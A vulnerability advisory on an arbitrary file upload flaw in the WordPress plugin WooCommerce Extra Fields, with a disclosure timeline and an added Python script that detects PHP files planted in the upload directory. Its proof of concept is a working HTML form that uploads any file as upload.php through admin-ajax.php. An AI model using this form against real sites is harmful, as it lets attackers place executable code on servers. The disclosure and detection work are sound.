19 Sep

Arbitrary File Upload Vulnerability in WooCommerce Extra Fields

After discovering an arbitrary file upload vulnerability in the plugin N-Media Post Front-end Form recently, we took a look at other plugins from the same developer and found that three others shared the same vulnerable code. One of those was WooCommerce Extra Fields (which has now been renamed WooCommerce Product Addons).

The vulnerability was subsequently fixed in version 2.0.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/product_files/ as upload.php. WooCommerce needs to be enabled for this to work.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_personalizedproduct_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
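For defenders checking whether a site running an affected version was abused, the script below is an added example, not part of the original advisory and not the plugin's own code. It assumes the upload directory named above (wp-content/uploads/product_files/), an Apache combined-format access log, and a list of PHP-handled extensions that must be tuned to the host; the sample files and log lines are constructed for the example. Note that the action name from the proof of concept travels in the multipart POST body, which an access log does not record, and POSTs to admin-ajax.php are routine for WooCommerce, so the reliable indicators are a PHP file sitting in the product uploads directory and a later request that executes it.

```python
import os
import re
import tempfile
from pathlib import Path

# Extensions that common Apache/PHP-FPM setups execute as PHP. This set is an
# assumption for the example; match it to the handlers configured on the host.
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}

# Directory the vulnerable endpoint writes to, as named in the advisory.
UPLOAD_DIR = "wp-content/uploads/product_files"

# Apache combined log format (assumed); enough to pull client, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (not from any real site).
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jul/2016:10:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [16/Jul/2016:10:01:05 +0000] "GET /wp-content/uploads/product_files/upload.php HTTP/1.1" 200 350 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Jul/2016:10:02:00 +0000] "GET /wp-content/uploads/2016/07/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


def find_executable_uploads(wp_root):
    """Return files under the product upload directory that a web server may run as code.

    Nothing in a product attachment directory should carry a PHP extension, so any
    hit is worth investigating. Every suffix is checked so a double extension such
    as "file.php.jpg" is caught on servers that evaluate the first extension.
    """
    hits = []
    base = Path(wp_root) / UPLOAD_DIR
    if not base.is_dir():
        return hits
    for p in base.rglob("*"):
        if p.is_file() and any(s.lower() in EXECUTABLE_EXTENSIONS for s in p.suffixes):
            hits.append(str(p.relative_to(wp_root)))
    return sorted(hits)


def find_suspicious_requests(log_lines):
    """Flag access log entries that request an executable file under wp-content/uploads/.

    The upload itself looks like any other admin-ajax.php POST in the log, so this
    looks for the follow-up request that executes the uploaded file instead.
    Returns (client_ip, path, status) tuples.
    """
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines not in the assumed format
        path = m.group("path").split("?", 1)[0]
        ext = os.path.splitext(path)[1].lower()
        if "/wp-content/uploads/" in path and ext in EXECUTABLE_EXTENSIONS:
            findings.append((m.group("ip"), path, m.group("status")))
    return findings


def demo():
    """Build a constructed WordPress tree in a temp dir and run both checks on it."""
    with tempfile.TemporaryDirectory() as root:
        target = Path(root) / UPLOAD_DIR
        target.mkdir(parents=True)
        # Constructed placeholder file, not a real payload.
        (target / "upload.php").write_text("<?php // placeholder\n")
        (target / "swatch.png").write_bytes(b"\x89PNG\r\n\x1a\n")
        media = Path(root) / "wp-content/uploads/2016/07"
        media.mkdir(parents=True)
        (media / "photo.jpg").write_bytes(b"\xff\xd8\xff")
        return find_executable_uploads(root), find_suspicious_requests(SAMPLE_LOG)


if __name__ == "__main__":
    files, requests = demo()
    print("executable uploads:", files)
    print("suspicious requests:", requests)
```

A hit from either check on a site that ran an affected version means the file should be removed and the site treated as compromised rather than merely patched; the usual complementary mitigation is a web server rule that refuses to execute PHP anywhere under wp-content/uploads/, which turns an upload of this kind into a harmless static file.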

Timeline

  • 7/16/2016 – Developer notified.
  • 7/16/2016 – Developer responds.
  • 8/2/2016 – Version 2.0 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if they knew about them, as well as making sure that the needed security checks have been implemented in the plugin. If you order two reviews you will receive a free lifetime subscription to our service.
